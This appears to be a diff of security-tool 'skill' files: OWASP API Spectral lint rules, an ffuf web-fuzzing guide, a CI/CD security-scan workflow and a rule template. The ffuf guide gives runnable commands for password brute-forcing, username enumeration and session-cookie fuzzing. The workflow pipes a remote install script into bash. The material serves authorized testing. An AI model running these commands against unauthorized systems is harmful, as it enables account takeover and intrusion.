message: "Explicitly define all object properties to control data exposure (OWASP API3:2023)"
# Warn on write-only properties
detect-write-only-properties:
description: Document write-only properties to prevent data exposure
severity: info
given: $.components.schemas[*].properties[*]
then:
- field: writeOnly
function: truthy
message: "Ensure write-only properties are properly handled (OWASP API3:2023)"
# Require read-only for sensitive computed fields
computed-fields-read-only:
description: Computed fields should be marked as readOnly
severity: warn
given: $.components.schemas[*].properties[?(@.description =~ /calculated|computed|derived/i)]
then:
- field: readOnly
function: truthy
message: "Mark computed/calculated fields as readOnly (OWASP API3:2023)"
```
### Remediation
- Set `additionalProperties: false` in schemas to prevent mass assignment
- Use `readOnly` for properties that shouldn't be modified by clients
- Use `writeOnly` for sensitive input properties (passwords, tokens)
- Document which properties are accessible to which user roles
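At the application layer the same idea can be enforced with a strict input model. A sketch assuming Pydantic v2, where `extra="forbid"` mirrors `additionalProperties: false`:
```python
from pydantic import BaseModel, ConfigDict, ValidationError

class UserUpdate(BaseModel):
    model_config = ConfigDict(extra="forbid")  # unknown fields are rejected (no mass assignment)
    display_name: str | None = None
    email: str | None = None
    # Note: privileged fields such as role/is_admin are deliberately not accepted

try:
    UserUpdate(display_name="alice", is_admin=True)
except ValidationError as exc:
    print(exc)  # extra field "is_admin" is rejected
```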
---
## API4:2023 - Unrestricted Resource Consumption
**Description**: Satisfying API requests requires resources such as network bandwidth, CPU, memory, and storage. Sometimes required resources are made available by service providers via API integrations, and paid for per request, such as sending emails/SMS/phone calls, biometrics validation, etc.
### Spectral Rules
```yaml
# .spectral-api4.yaml
rules:
# Require rate limit documentation
rate-limit-headers-documented:
description: API should document rate limiting headers
severity: warn
given: $.paths[*][*].responses[*].headers
then:
function: schema
functionOptions:
schema:
type: object
anyOf:
- required: [X-RateLimit-Limit]
- required: [X-RateLimit-Remaining]
message: "Document rate limiting headers (X-RateLimit-*) to communicate consumption limits (OWASP API4:2023)"
# Detect pagination parameters
pagination-required:
description: List operations should support pagination
severity: warn
given: $.paths[*].get.parameters
then:
function: schema
functionOptions:
schema:
type: array
contains:
anyOf:
- properties:
name:
const: limit
- properties:
name:
const: offset
message: "List operations should support pagination (limit/offset or cursor) to prevent resource exhaustion (OWASP API4:2023)"
# Maximum response size documentation
response-size-limits:
description: Document maximum response sizes
severity: info
given: $.paths[*][*].responses[*]
then:
- field: description
function: pattern
functionOptions:
match: "(maximum|max|limit).*(size|length|count)"
message: "Consider documenting maximum response sizes (OWASP API4:2023)"
```
### Remediation
- Implement rate limiting and document limits in API specification
- Use pagination for all list operations (limit/offset or cursor-based)
- Document maximum request/response sizes
- Implement request timeout and maximum execution time limits
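A minimal sketch of the server-side counterpart to the pagination rule, clamping client-supplied limits so a single request cannot demand unbounded results (assuming Flask; `fetch_items` is a hypothetical data-access helper):
```python
from flask import Flask, jsonify, request

app = Flask(__name__)
MAX_LIMIT = 100  # illustrative hard cap per request

@app.route("/items")
def list_items():
    limit = max(1, min(request.args.get("limit", default=20, type=int), MAX_LIMIT))
    offset = max(request.args.get("offset", default=0, type=int), 0)
    items = fetch_items(limit=limit, offset=offset)  # hypothetical data-access helper
    return jsonify({"items": items, "limit": limit, "offset": offset})
```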
---
## API8:2023 - Security Misconfiguration
**Description**: APIs and the systems supporting them typically contain complex configurations, meant to make the APIs more customizable. Software and DevOps engineers can miss these configurations, or don't follow security best practices when it comes to configuration, opening the door for different types of attacks.
### Spectral Rules
```yaml
# .spectral-api8.yaml
rules:
# Require HTTPS for all servers
servers-use-https:
description: All API servers must use HTTPS
severity: error
given: $.servers[*].url
then:
function: pattern
functionOptions:
match: "^https://"
message: "Server URLs must use HTTPS protocol for secure communication (OWASP API8:2023)"
# Detect example.com in server URLs
no-example-servers:
description: Replace example server URLs with actual endpoints
severity: error
given: $.servers[*].url
then:
function: pattern
functionOptions:
notMatch: "example\\.com"
message: "Replace example.com with actual server URL (OWASP API8:2023)"
# Require security headers documentation
security-headers-documented:
description: Document security headers in responses
severity: warn
given: $.paths[*][*].responses[*].headers
then:
function: schema
functionOptions:
schema:
type: object
anyOf:
- required: [X-Content-Type-Options]
- required: [X-Frame-Options]
- required: [Strict-Transport-Security]
message: "Document security headers (X-Content-Type-Options, X-Frame-Options, HSTS) in responses (OWASP API8:2023)"
# CORS configuration review
cors-documented:
description: CORS should be properly configured and documented
severity: info
given: $.paths[*].options
then:
- field: responses
function: truthy
message: "Ensure CORS is properly configured - review Access-Control-* headers (OWASP API8:2023)"
```
### Remediation
- Use HTTPS for all API endpoints
- Configure and document security headers (HSTS, X-Content-Type-Options, X-Frame-Options)
- Properly configure CORS with specific origins (avoid wildcard in production)
- Disable unnecessary HTTP methods
- Remove verbose error messages in production
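A sketch of attaching the documented security headers to every response (assuming Flask; the values shown are common defaults and should be tuned per application):
```python
from flask import Flask

app = Flask(__name__)

@app.after_request
def add_security_headers(response):
    response.headers.setdefault("Strict-Transport-Security",
                                "max-age=63072000; includeSubDomains")
    response.headers.setdefault("X-Content-Type-Options", "nosniff")
    response.headers.setdefault("X-Frame-Options", "DENY")
    return response
```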
---
## API9:2023 - Improper Inventory Management
**Description**: APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. A proper inventory of hosts and deployed API versions is also important for mitigating issues such as deprecated API versions and exposed debug endpoints.
### Spectral Rules
```yaml
# .spectral-api9.yaml
rules:
# Require API version
api-version-required:
description: API specification must include version
severity: error
given: $.info
then:
- field: version
function: truthy
message: "API version must be specified for proper inventory management (OWASP API9:2023)"
# Version format validation
semantic-versioning:
description: Use semantic versioning for API versions
severity: warn
given: $.info.version
then:
function: pattern
functionOptions:
match: "^\\d+\\.\\d+\\.\\d+"
message: "Use semantic versioning (MAJOR.MINOR.PATCH) for API versions (OWASP API9:2023)"
# Require contact information
contact-info-required:
description: API must include contact information
severity: warn
given: $.info
then:
- field: contact
function: truthy
message: "Include contact information for API support and security issues (OWASP API9:2023)"
# Require terms of service or license
legal-info-required:
description: API should include legal information
severity: info
given: $.info
then:
- field: license
function: truthy
message: "Include license or terms of service for API usage (OWASP API9:2023)"
# Deprecation documentation
deprecated-endpoints-documented:
description: Deprecated endpoints must be clearly marked
severity: warn
given: $.paths[*][*][?(@.deprecated == true)]
then:
- field: description
function: pattern
functionOptions:
match: "(deprecate|migrate|alternative|replacement)"
message: "Document deprecation details and migration path (OWASP API9:2023)"
```
### Remediation
- Maintain up-to-date API specification with version information
- Use semantic versioning for API versions
- Document all endpoints, including internal and deprecated ones
- Include contact information for security issues
- Implement API inventory management and discovery tools
- Remove or properly secure debug/admin endpoints in production
---
## Complete OWASP Ruleset Example
```yaml
# .spectral-owasp-complete.yaml
extends: ["spectral:oas"]
rules:
# API1: Broken Object Level Authorization
operation-security-defined:
description: All operations must have security requirements
severity: error
given: $.paths[*][get,post,put,patch,delete]
then:
field: security
function: truthy
message: "All operations must have security defined (OWASP API1:2023)"
# API2: Broken Authentication
no-http-basic-auth:
description: Prohibit HTTP Basic authentication
severity: error
given: $.components.securitySchemes[*]
then:
field: scheme
function: pattern
functionOptions:
notMatch: "^basic$"
message: "HTTP Basic auth is insecure (OWASP API2:2023)"
# API3: Broken Object Property Level Authorization
no-additional-properties:
description: Prevent mass assignment
severity: warn
given: $.components.schemas[?(@.type == 'object')]
then:
field: additionalProperties
function: falsy
message: "Set additionalProperties to false (OWASP API3:2023)"
# API4: Unrestricted Resource Consumption
pagination-for-lists:
description: List operations should support pagination
severity: warn
given: $.paths[*].get
then:
field: parameters
function: truthy
message: "Implement pagination for list operations (OWASP API4:2023)"
# API8: Security Misconfiguration
servers-use-https:
description: All servers must use HTTPS
severity: error
given: $.servers[*].url
then:
function: pattern
functionOptions:
match: "^https://"
message: "Server URLs must use HTTPS (OWASP API8:2023)"
# API9: Improper Inventory Management
api-version-required:
description: API must specify version
severity: error
given: $.info
then:
field: version
function: truthy
message: "API version is required (OWASP API9:2023)"
```
## Additional Resources
- [OWASP API Security Top 10 2023](https://owasp.org/API-Security/editions/2023/en/0x11-t10/)
- [Spectral Rulesets Documentation](https://docs.stoplight.io/docs/spectral/docs/getting-started/rulesets.md)
- [OpenAPI Security Best Practices](https://swagger.io/docs/specification/authentication/)

View File

@@ -0,0 +1,476 @@
---
name: dast-ffuf
description: >
Fast web fuzzer for DAST testing with directory enumeration, parameter fuzzing, and virtual host
discovery. Written in Go for high-performance HTTP fuzzing with extensive filtering capabilities.
Supports multiple fuzzing modes (clusterbomb, pitchfork, sniper) and recursive scanning. Use when:
(1) Discovering hidden directories, files, and endpoints on web applications, (2) Fuzzing GET and
POST parameters to identify injection vulnerabilities, (3) Enumerating virtual hosts and subdomains,
(4) Testing authentication endpoints with credential fuzzing, (5) Finding backup files and sensitive
data exposures, (6) Performing comprehensive web application reconnaissance.
version: 0.1.0
maintainer: SirAppSec
category: appsec
tags: [dast, fuzzing, web-fuzzer, directory-enumeration, parameter-fuzzing, vhost-discovery, ffuf, reconnaissance]
frameworks: [OWASP]
dependencies:
tools: [ffuf]
references:
- https://github.com/ffuf/ffuf
---
# ffuf - Fast Web Fuzzer
## Overview
ffuf is a fast web fuzzer written in Go designed for discovering hidden resources, testing parameters, and performing comprehensive web application reconnaissance. It uses the FUZZ keyword as a placeholder for wordlist entries and supports advanced filtering, multiple fuzzing modes, and recursive scanning for thorough security assessments.
## Installation
```bash
# Using Go
go install github.com/ffuf/ffuf/v2@latest
# Using package managers
# Debian/Ubuntu
apt install ffuf
# macOS
brew install ffuf
# Or download pre-compiled binary from GitHub releases
```
## Quick Start
Basic directory fuzzing:
```bash
# Directory discovery
ffuf -u https://example.com/FUZZ -w /usr/share/wordlists/dirb/common.txt
# File discovery with extension
ffuf -u https://example.com/FUZZ -w wordlist.txt -e .php,.html,.txt
# Virtual host discovery
ffuf -u https://example.com -H "Host: FUZZ.example.com" -w subdomains.txt
```
## Core Workflows
### Workflow 1: Directory and File Enumeration
For discovering hidden resources on web applications:
1. Start with common directory wordlist:
```bash
ffuf -u https://target.com/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-mc 200,204,301,302,307,401,403 \
-o results.json
```
2. Review discovered directories (focus on 200, 403 status codes)
3. Enumerate files in discovered directories:
```bash
ffuf -u https://target.com/admin/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/raft-small-files.txt \
-e .php,.bak,.txt,.zip \
-mc all -fc 404
```
4. Use recursive mode for deep enumeration:
```bash
ffuf -u https://target.com/FUZZ \
-w wordlist.txt \
-recursion -recursion-depth 2 \
-e .php,.html \
-v
```
5. Document findings and test discovered endpoints
### Workflow 2: Parameter Fuzzing (GET/POST)
Progress:
[ ] 1. Identify target endpoint for parameter testing
[ ] 2. Fuzz GET parameter names to discover hidden parameters
[ ] 3. Fuzz parameter values for injection vulnerabilities
[ ] 4. Test POST parameters with JSON/form data
[ ] 5. Apply appropriate filters to reduce false positives
[ ] 6. Analyze responses for anomalies and vulnerabilities
[ ] 7. Validate findings manually
[ ] 8. Document vulnerable parameters and payloads
Work through each step systematically. Check off completed items.
**GET Parameter Name Fuzzing:**
```bash
ffuf -u https://target.com/api?FUZZ=test \
-w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-fs 0 # Filter out empty responses
```
**GET Parameter Value Fuzzing:**
```bash
ffuf -u https://target.com/api?id=FUZZ \
-w payloads.txt \
-mc all
```
**POST Data Fuzzing:**
```bash
# Form data
ffuf -u https://target.com/login \
-X POST \
-d "username=admin&password=FUZZ" \
-w passwords.txt \
-H "Content-Type: application/x-www-form-urlencoded"
# JSON data
ffuf -u https://target.com/api/login \
-X POST \
-d '{"username":"admin","password":"FUZZ"}' \
-w passwords.txt \
-H "Content-Type: application/json"
```
### Workflow 3: Virtual Host and Subdomain Discovery
For identifying virtual hosts and subdomains:
1. Prepare subdomain wordlist (or use SecLists)
2. Run vhost fuzzing:
```bash
ffuf -u https://target.com \
-H "Host: FUZZ.target.com" \
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-ac # Auto-calibrate filtering to drop the default (catch-all) vhost response
```
3. Filter results by comparing response sizes/words
4. Verify discovered vhosts manually
5. Enumerate directories on each vhost
6. Document vhost configurations and exposed services
### Workflow 4: Authentication Endpoint Fuzzing
For testing login forms and authentication mechanisms:
1. Identify authentication endpoint
2. Fuzz usernames:
```bash
ffuf -u https://target.com/login \
-X POST \
-d "username=FUZZ&password=test123" \
-w usernames.txt \
-H "Content-Type: application/x-www-form-urlencoded" \
-mr "Invalid password|Incorrect password" # Match responses indicating valid user
```
3. For identified users, fuzz passwords:
```bash
ffuf -u https://target.com/login \
-X POST \
-d "username=admin&password=FUZZ" \
-w /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt \
-H "Content-Type: application/x-www-form-urlencoded" \
-fc 401,403 # Filter failed attempts
```
4. Use clusterbomb mode for combined username/password fuzzing:
```bash
ffuf -u https://target.com/login \
-X POST \
-d "username=FUZZ1&password=FUZZ2" \
-w usernames.txt:FUZZ1 \
-w passwords.txt:FUZZ2 \
-mode clusterbomb
```
### Workflow 5: Backup and Sensitive File Discovery
For finding exposed backup files and sensitive data:
1. Create wordlist of common backup patterns
2. Fuzz for backup files:
```bash
ffuf -u https://target.com/FUZZ \
-w backup-files.txt \
-e .bak,.backup,.old,.zip,.tar.gz,.sql,.7z \
-mc 200 \
-o backup-files.json
```
3. Test common sensitive file locations:
```bash
ffuf -u https://target.com/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/sensitive-files.txt \
-mc 200,403
```
4. Download and analyze discovered files
5. Report findings with severity classification
## Fuzzing Modes
ffuf supports multiple fuzzing modes for different attack scenarios:
**Clusterbomb Mode** - Cartesian product of all wordlists (default):
```bash
ffuf -u https://target.com/FUZZ1/FUZZ2 \
-w dirs.txt:FUZZ1 \
-w files.txt:FUZZ2 \
-mode clusterbomb
```
Tests every combination: dir1/file1, dir1/file2, dir2/file1, dir2/file2
**Pitchfork Mode** - Parallel iteration of wordlists:
```bash
ffuf -u https://target.com/login \
-X POST \
-d "username=FUZZ1&password=FUZZ2" \
-w users.txt:FUZZ1 \
-w passwords.txt:FUZZ2 \
-mode pitchfork
```
Tests pairs: user1/pass1, user2/pass2 (stops at shortest wordlist)
**Sniper Mode** - One wordlist, multiple positions:
```bash
ffuf -u https://target.com/FUZZ \
-w wordlist.txt \
-mode sniper
```
Standard single-wordlist fuzzing.
## Filtering and Matching
Effective filtering is crucial for reducing noise:
**Match Filters** (only show matching):
- `-mc 200,301` - Match HTTP status codes
- `-ms 1234` - Match response size
- `-mw 100` - Match word count
- `-ml 50` - Match line count
- `-mr "success|admin"` - Match regex pattern in response
**Filter Options** (exclude matching):
- `-fc 404,403` - Filter status codes
- `-fs 0,1234` - Filter response sizes
- `-fw 0` - Filter word count
- `-fl 0` - Filter line count
- `-fr "error|not found"` - Filter regex pattern
**Auto-Calibration:**
```bash
# Automatically filter baseline responses
ffuf -u https://target.com/FUZZ -w wordlist.txt -ac
```
## Common Patterns
### Pattern 1: API Endpoint Discovery
Discover REST API endpoints:
```bash
# Enumerate API paths
ffuf -u https://api.target.com/v1/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
-mc 200,201,401,403 \
-o api-endpoints.json
# Fuzz API versions
ffuf -u https://api.target.com/FUZZ/users \
-w <(seq 1 10 | sed 's/^/v/') \
-mc 200
```
### Pattern 2: Extension Fuzzing
Test multiple file extensions:
```bash
# Brute-force extensions on known files
ffuf -u https://target.com/admin.FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt \
-mc 200
# Or use -e flag for multiple extensions
ffuf -u https://target.com/FUZZ \
-w filenames.txt \
-e .php,.asp,.aspx,.jsp,.html,.bak,.txt
```
### Pattern 3: Rate-Limited Fuzzing
Respect rate limits and avoid detection:
```bash
# Add delay between requests
ffuf -u https://target.com/FUZZ \
-w wordlist.txt \
-p 0.5-1.0 # Random delay 0.5-1.0 seconds
# Limit concurrent requests
ffuf -u https://target.com/FUZZ \
-w wordlist.txt \
-t 5 # Only 5 concurrent threads
```
### Pattern 4: Custom Header Fuzzing
Fuzz HTTP headers for security misconfigurations:
```bash
# Fuzz custom headers
ffuf -u https://target.com/admin \
-w headers.txt:HEADER \
-H "HEADER: true" \
-mc all
# Fuzz header values
ffuf -u https://target.com/admin \
-H "X-Forwarded-For: FUZZ" \
-w /usr/share/seclists/Fuzzing/IPs.txt \
-mc 200
```
### Pattern 5: Cookie Fuzzing
Test cookie-based authentication and session management:
```bash
# Fuzz cookie values
ffuf -u https://target.com/dashboard \
-b "session=FUZZ" \
-w session-tokens.txt \
-mc 200
# Fuzz cookie names
ffuf -u https://target.com/admin \
-b "FUZZ=admin" \
-w cookie-names.txt
```
## Output Formats
Save results in multiple formats:
```bash
# JSON output (recommended for parsing)
ffuf -u https://target.com/FUZZ -w wordlist.txt -o results.json -of json
# CSV output
ffuf -u https://target.com/FUZZ -w wordlist.txt -o results.csv -of csv
# HTML report
ffuf -u https://target.com/FUZZ -w wordlist.txt -o results.html -of html
# All formats
ffuf -u https://target.com/FUZZ -w wordlist.txt -o results -of all
```
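JSON output is the easiest to post-process. A sketch of triaging a results file in Python (ffuf's JSON report keeps findings under a top-level `results` array with `status`, `length`, and `url` fields):
```python
import json
from collections import Counter

with open("results.json") as f:
    data = json.load(f)

results = data.get("results", [])
print("Hits by status code:", dict(Counter(r["status"] for r in results)))

# Surface the endpoints most worth manual review first
for r in sorted(results, key=lambda r: r["status"]):
    if r["status"] in (200, 401, 403):
        print(f'{r["status"]} {r["length"]:>8} {r["url"]}')
```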
## Security Considerations
- **Sensitive Data Handling**: Discovered files may contain credentials, API keys, or PII. Handle findings securely and report responsibly
- **Access Control**: Only fuzz applications with proper authorization. Obtain written permission before testing third-party systems
- **Audit Logging**: Log all fuzzing activities including targets, wordlists used, and findings for compliance and audit trails
- **Compliance**: Ensure fuzzing activities comply with bug bounty program rules, penetration testing agreements, and legal requirements
- **Safe Defaults**: Use reasonable rate limits to avoid DoS conditions. Start with small wordlists before scaling up
## Integration Points
### Reconnaissance Workflow
1. Subdomain enumeration (amass, subfinder)
2. Port scanning (nmap)
3. Service identification
4. **ffuf directory/file enumeration**
5. Content discovery and analysis
6. Vulnerability scanning
### CI/CD Security Testing
Integrate ffuf into automated security pipelines:
```bash
# CI/CD script
#!/bin/bash
set -e
# Run directory enumeration
ffuf -u https://staging.example.com/FUZZ \
-w /wordlists/common.txt \
-mc 200,403 \
-o ffuf-results.json \
-of json
# Parse results and fail if sensitive files found
if grep -q "/.git/\|/backup/" ffuf-results.json; then
echo "ERROR: Sensitive files exposed!"
exit 1
fi
```
### Integration with Burp Suite
1. Use Burp to identify target endpoints
2. Export interesting requests
3. Convert to ffuf commands for automated fuzzing
4. Import ffuf results back to Burp for manual testing
## Troubleshooting
### Issue: Too Many False Positives
**Solution**: Use auto-calibration or manual filtering:
```bash
# Auto-calibration
ffuf -u https://target.com/FUZZ -w wordlist.txt -ac
# Manual filtering by size
ffuf -u https://target.com/FUZZ -w wordlist.txt -fs 1234,5678
```
### Issue: Rate Limiting or Blocking
**Solution**: Reduce concurrency and add delays:
```bash
ffuf -u https://target.com/FUZZ \
-w wordlist.txt \
-t 1 \
-p 2.0 \
-H "User-Agent: Mozilla/5.0..."
```
### Issue: Large Wordlist Takes Too Long
**Solution**: Start with smaller, targeted wordlists:
```bash
# Use top 1000 instead of full list
head -1000 /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt > small.txt
ffuf -u https://target.com/FUZZ -w small.txt
```
### Issue: Missing Discovered Content
**Solution**: Test with multiple extensions and match codes:
```bash
ffuf -u https://target.com/FUZZ \
-w wordlist.txt \
-e .php,.html,.txt,.asp,.aspx,.jsp \
-mc all \
-fc 404
```
## OWASP Testing Integration
Map ffuf usage to OWASP Testing Guide categories:
- **WSTG-CONF-04**: Review Old Backup and Unreferenced Files
- **WSTG-CONF-05**: Enumerate Infrastructure and Application Admin Interfaces
- **WSTG-CONF-06**: Test HTTP Methods
- **WSTG-IDNT-01**: Test Role Definitions (directory enumeration)
- **WSTG-ATHZ-01**: Test Directory Traversal/File Include
- **WSTG-INPV-01**: Test for Reflected Cross-site Scripting
- **WSTG-INPV-02**: Test for Stored Cross-site Scripting
## References
- [ffuf GitHub Repository](https://github.com/ffuf/ffuf)
- [SecLists Wordlists](https://github.com/danielmiessler/SecLists)
- [OWASP Web Security Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,357 @@
# Security-Enhanced CI/CD Pipeline Template
#
# This template demonstrates security best practices for CI/CD pipelines.
# Adapt this template to your specific security tool and workflow needs.
#
# Key Security Features:
# - SAST (Static Application Security Testing)
# - Dependency vulnerability scanning
# - Secrets detection
# - Infrastructure-as-Code security scanning
# - Container image scanning
# - Security artifact uploading for compliance
name: Security Scan Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main, develop]
schedule:
# Run weekly security scans on Sunday at 2 AM UTC
- cron: '0 2 * * 0'
workflow_dispatch: # Allow manual trigger
# Security: Restrict permissions to minimum required
permissions:
contents: read
security-events: write # For uploading SARIF results
pull-requests: write # For commenting on PRs
env:
# Configuration
SECURITY_SCAN_FAIL_ON: 'critical,high' # Fail build on these severities
REPORT_DIR: 'security-reports'
jobs:
# Job 1: Static Application Security Testing (SAST)
sast-scan:
name: SAST Security Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history for better analysis
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Run SAST Scanner
run: |
mkdir -p ${{ env.REPORT_DIR }}
# Example: Using Semgrep for SAST
pip install semgrep
semgrep --config=auto \
--json \
--output ${{ env.REPORT_DIR }}/sast-results.json \
. || true
# Alternative: Bandit for Python projects
# pip install bandit
# bandit -r . -f json -o ${{ env.REPORT_DIR }}/bandit-results.json
- name: Process SAST Results
run: |
# Parse results and fail on critical/high severity
python3 -c "
import json
import sys
with open('${{ env.REPORT_DIR }}/sast-results.json') as f:
results = json.load(f)
critical = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'ERROR'])
high = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'WARNING'])
print(f'Critical findings: {critical}')
print(f'High findings: {high}')
if critical > 0:
print('❌ Build failed: Critical security issues found')
sys.exit(1)
elif high > 0:
print('⚠️ Warning: High severity issues found')
# Optionally fail on high severity
# sys.exit(1)
else:
print('✅ No critical security issues found')
"
- name: Upload SAST Results
if: always()
uses: actions/upload-artifact@v4
with:
name: sast-results
path: ${{ env.REPORT_DIR }}/sast-results.json
retention-days: 30
# Job 2: Dependency Vulnerability Scanning
dependency-scan:
name: Dependency Vulnerability Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Scan Python Dependencies
if: hashFiles('requirements.txt') != ''
run: |
mkdir -p ${{ env.REPORT_DIR }}
pip install safety
# safety prints JSON to stdout; capture it with a redirect
safety check --json > ${{ env.REPORT_DIR }}/safety-results.json || true
- name: Scan Node Dependencies
if: hashFiles('package.json') != ''
run: |
npm audit --json > ${{ env.REPORT_DIR }}/npm-audit.json || true
- name: Process Dependency Results
run: |
# Check for critical vulnerabilities
if [ -f "${{ env.REPORT_DIR }}/safety-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/safety-results.json')); print(len([v for v in data.get('vulnerabilities', []) if v.get('severity', '').lower() == 'critical']))")
echo "Critical vulnerabilities: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "❌ Build failed: Critical vulnerabilities in dependencies"
exit 1
fi
fi
- name: Upload Dependency Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: dependency-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 3: Secrets Detection
secrets-scan:
name: Secrets Detection
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history to scan all commits
- name: Run Gitleaks
uses: gitleaks/gitleaks-action@v2
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
GITLEAKS_ENABLE_SUMMARY: true
- name: Alternative - TruffleHog Scan
if: false # Set to true to enable
run: |
pip install truffleHog
trufflehog --json --regex --entropy=True . \
> ${{ env.REPORT_DIR }}/trufflehog-results.json || true
- name: Upload Secrets Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: secrets-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 4: Container Image Scanning
container-scan:
name: Container Image Security Scan
runs-on: ubuntu-latest
if: hashFiles('Dockerfile') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Build Docker Image
run: |
docker build -t app:${{ github.sha }} .
- name: Run Trivy Scanner
uses: aquasecurity/trivy-action@master
with:
image-ref: app:${{ github.sha }}
format: 'sarif'
output: '${{ env.REPORT_DIR }}/trivy-results.sarif'
severity: 'CRITICAL,HIGH'
- name: Upload Trivy Results to GitHub Security
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: '${{ env.REPORT_DIR }}/trivy-results.sarif'
- name: Upload Container Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: container-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 5: Infrastructure-as-Code Security Scanning
iac-scan:
name: IaC Security Scan
runs-on: ubuntu-latest
if: hashFiles('**/*.tf', '**/*.yaml', '**/*.yml') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run Checkov
run: |
pip install checkov
checkov -d . \
--output json \
--output-file ${{ env.REPORT_DIR }}/checkov-results.json \
--quiet \
|| true
- name: Run tfsec (for Terraform)
if: hashFiles('**/*.tf') != ''
run: |
curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash
tfsec . \
--format json \
--out ${{ env.REPORT_DIR }}/tfsec-results.json \
|| true
- name: Process IaC Results
run: |
# Fail on critical findings
if [ -f "${{ env.REPORT_DIR }}/checkov-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/checkov-results.json')); print(data.get('summary', {}).get('failed', 0))")
echo "Failed checks: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "⚠️ Warning: IaC security issues found"
# Optionally fail the build
# exit 1
fi
fi
- name: Upload IaC Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: iac-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 6: Security Report Generation and Notification
security-report:
name: Generate Security Report
runs-on: ubuntu-latest
needs: [sast-scan, dependency-scan, secrets-scan]
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Download All Scan Results
uses: actions/download-artifact@v4
with:
path: all-results/
- name: Generate Consolidated Report
run: |
# Consolidate all security scan results
mkdir -p consolidated-report
cat > consolidated-report/security-summary.md << EOF
# Security Scan Summary
**Scan Date**: $(date -u +"%Y-%m-%d %H:%M:%S UTC")
**Commit**: ${{ github.sha }}
**Branch**: ${{ github.ref_name }}
## Scan Results
### SAST Scan
See artifacts: \`sast-results\`
### Dependency Scan
See artifacts: \`dependency-scan-results\`
### Secrets Scan
See artifacts: \`secrets-scan-results\`
### Container Scan
See artifacts: \`container-scan-results\`
### IaC Scan
See artifacts: \`iac-scan-results\`
---
For detailed results, download scan artifacts from this workflow run.
EOF
- name: Comment on PR (if applicable)
if: github.event_name == 'pull_request'
uses: actions/github-script@v7
with:
script: |
const fs = require('fs');
const report = fs.readFileSync('consolidated-report/security-summary.md', 'utf8');
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: report
});
- name: Upload Consolidated Report
if: always()
uses: actions/upload-artifact@v4
with:
name: consolidated-security-report
path: consolidated-report/
retention-days: 90
# Security Best Practices Demonstrated:
#
# 1. ✅ Minimal permissions (principle of least privilege)
# 2. ✅ Multiple security scan types (defense in depth)
# 3. ✅ Fail-fast on critical findings
# 4. ✅ Secrets detection across full git history
# 5. ✅ Container image scanning before deployment
# 6. ✅ IaC scanning for misconfigurations
# 7. ✅ Artifact retention for compliance audit trail
# 8. ✅ SARIF format for GitHub Security integration
# 9. ✅ Scheduled scans for continuous monitoring
# 10. ✅ PR comments for developer feedback
#
# Compliance Mappings:
# - SOC 2: CC6.1, CC6.6, CC7.2 (Security monitoring and logging)
# - PCI-DSS: 6.2, 6.5 (Secure development practices)
# - NIST: SA-11 (Developer Security Testing)
# - OWASP: Integrated security testing throughout SDLC

View File

@@ -0,0 +1,355 @@
# Security Rule Template
#
# This template demonstrates how to structure security rules/policies.
# Adapt this template to your specific security tool (Semgrep, OPA, etc.)
#
# Rule Structure Best Practices:
# - Clear rule ID and metadata
# - Severity classification
# - Framework mappings (OWASP, CWE)
# - Remediation guidance
# - Example vulnerable and fixed code
rules:
# Example Rule 1: SQL Injection Detection
- id: sql-injection-string-concatenation
metadata:
name: "SQL Injection via String Concatenation"
description: "Detects potential SQL injection vulnerabilities from string concatenation in SQL queries"
severity: "HIGH"
category: "security"
subcategory: "injection"
# Security Framework Mappings
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-89: SQL Injection"
mitre_attack:
- "T1190: Exploit Public-Facing Application"
# Compliance Standards
compliance:
- "PCI-DSS 6.5.1: Injection flaws"
- "NIST 800-53 SI-10: Information Input Validation"
# Confidence and Impact
confidence: "HIGH"
likelihood: "HIGH"
impact: "HIGH"
